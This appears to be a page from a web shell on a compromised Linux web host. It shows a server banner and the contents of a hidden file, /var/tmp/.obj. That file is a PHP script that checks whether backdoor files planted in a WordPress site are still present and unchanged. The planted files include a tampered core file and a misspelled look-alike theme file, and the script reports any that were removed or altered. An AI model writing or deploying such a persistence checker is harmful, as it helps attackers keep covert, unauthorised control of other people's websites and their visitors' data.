HEX
Server: Apache
System: Linux pdx1-shared-a1-11 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: mollywopper (10344313)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //var/tmp/.obj

<?php $r = '/home/freyanator/freyawest.com'; $x = ["/wp-includes/class-wp-http-curl.php"=>"bd@@207331@@40", "/wp-content/themes/custom-file-1-1747416103/connents.php"=>"bd@@850@@1166", "/38cc1b.php"=>"bd@@108626@@105", "/wp-content/themes/trawell/core/enqueue.php"=>"bd@@240140@@73"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');